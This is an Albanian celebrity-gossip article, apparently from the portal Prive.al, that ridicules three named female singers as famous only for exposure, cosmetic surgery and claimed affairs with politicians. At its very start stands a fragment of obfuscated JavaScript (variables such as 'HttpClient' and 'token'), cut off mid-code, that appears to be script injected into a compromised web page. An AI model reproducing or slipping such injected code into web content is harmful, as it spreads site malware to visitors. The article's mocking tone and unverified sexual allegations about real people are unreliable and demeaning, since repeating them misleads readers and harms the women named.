;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Vajzat që u bënë të njohura për asgjë, përpos ekspozimit!

By

Në epokën e vërshimit të informacionit përmes platformave në rrjete sociale, gjërat janë shumë më të lehta se bie fjala, jo më larg se një dekadë më parë.

Interneti tashmë i ka ofruar mundësinë edhe shumë artistëve të rinj që të kapin ëndrrën pa shumë ‘filtra’ nëpër të cilët duhet kaluar.

Sot nuk është e thënë të vraposh drejt shtëpive diskografike për pak afirmim, mjafton një produkt muzikor i hedhur në Youtube, pak fat dhe caku arrihet lehtë.

Megjithatë, paralelisht me përparësitë që ofron koha në të cilën jetojmë për afirmim e sukses të njerëzve me talent, një ‘invazion’ i çuditshëm i njerëzve që realisht nuk bëjnë asgjë po shënohet edhe në trojet shqiptare.

Me tendencën që ‘asetet’ të vihen në plan të parë qoftë edhe përmes intervenimeve kirurgjikale, nuk janë të pakta vajzat që kanë bërë e bëjnë xhiro nëpër portale duke konsideruar veten si objekt joshjeje.

Prive.al ju sjell një përmbledhje të disa prej fytyrave publike që përtej ekspozimit të tepruar, skandaleve të sajuara e historive fiktive, nuk është se shquhen për gjë tjetër.

  1. Xhesika Ndoj

Me një repertor prej disa këngësh, asnjëra hit, këngëtarja nga Shqipëria ka zënë vend për çdo gjë tjetër pos muzikës në media. Që prej operacioneve plastike, skandaleve me foto të nxehta gjatë seksit e deri tek historia private e familjes së saj, ‘gama’ e lajmeve për Xhesikën përfshin një spektër të gjerë ku spikat një gjë – oferta nga deputetë të Parlamentit.

Gjerë e gjatë, Xhesika foli në media për një histori me një prej ligjvënësve i cili gjoja i ka propozuar për një natë. Publiku i ‘etur’ për intriga të tilla, mbeti pa ndonjë përgjigje. Dramë u bë edhe me një foto afër Ilir Metës të cilës për t’i dhënë efekt dramaciteti, nuk preferoi ta komentojë, deri në momentin kur edhe dolën videot nga kamerat e sigurisë që nuk shfaqnin asgjë pos një kalimi rastësor të dyshes pranë njëri-tjetrit në plazh.

Kur ‘mbaroi’ me politikanët shqiptarë, në një nivel qesharak, Xhesika potencoi se kishte ofertë për martesë edhe nga kryebashkiaku i Romës, por normalisht, gjithçka mbeti në kontekstin e një deklarate.


 

     2. Iva Aliko

Karrierën e ka nisur moti që në paraqitjet tek ‘Top Fest’ por shumë pak persona kishin dëgjuar deri këtë vit për Iva Alikon, këngëtaren nga Shqipëria që njejtë si Xhesika, nuk shquhet për ndonjë kapacitet vokal apo hit në karrierë, teksa kishte refuzuar në intervistë me Turjan Hyskën të këndonte të paktën një refren nën pretekstin e ftohjes.

Por, befasishëm, karta e njejtë – seksit me politikan ‘dhezi’ duke e shndërruar Ivën në kryetemë të portaleve. Aliko deklaroi se është në lidhje me një deputet të PDK-së i cili e viziton periodikisht në banesën që ia ka blerë, diku në Shqipëri. Verifikimi i listave në bazë të moshës nuk rezultoi në asgjë. Iva, as nuk shiti apartamentin për bamirësi e as nuk e vazhdoi lojën e fjalëve, tashmë kur me kalimin e disa muajve interesi për të u fashit. Buzët, gjoksi, të pasmet janë momentalisht, gjëja e vetme me të cilën ‘mbahet’ në media këngëtarja.


 

     3. Merita Haxhia – Gugu

Joo! Lista nuk mbaron me Xhesikën e Ivën pa u përmendur një tjetër kolege, Gugu. Vajza nga Shqipëria, gjithashtu mori vëmendjen gjatë 2016-tës fillimisht duke nisur ‘luftën’ virtuale brenda sojit, duke u grindur me Xhesika Ndojën, me të cilën gjoja e bashkon edhe i dashuri.

Por, pashmangshëm, nuk kishte se si të mungonte një politikan në lojë. Gugu deklaroi se ka qenë në lidhje me ministër të qeverisë Rama për disa muaj derisa u nda dhe kinse i dogji makinën. Dikur, kur shterroi edhe kjo pjesë, karta e të qenurit biseksuale u riaktivizua, në po të njejtën strategi me atë të koleges, Xhesikës.

Se çka na pret në vazhdim nuk dihet kur karta e deputetëve e politikanëve po digjet! Por, ajo që dihet sigurt është se ato të vërtetat, të ministrave, mund t’i dëgjojmë  duke folur për çdo gjë tjetër pos kësaj, teksa luksin, pushimet, operacionet i kanë të garantuar në terma të gjatë kohor!

Artikuj të ngjashëm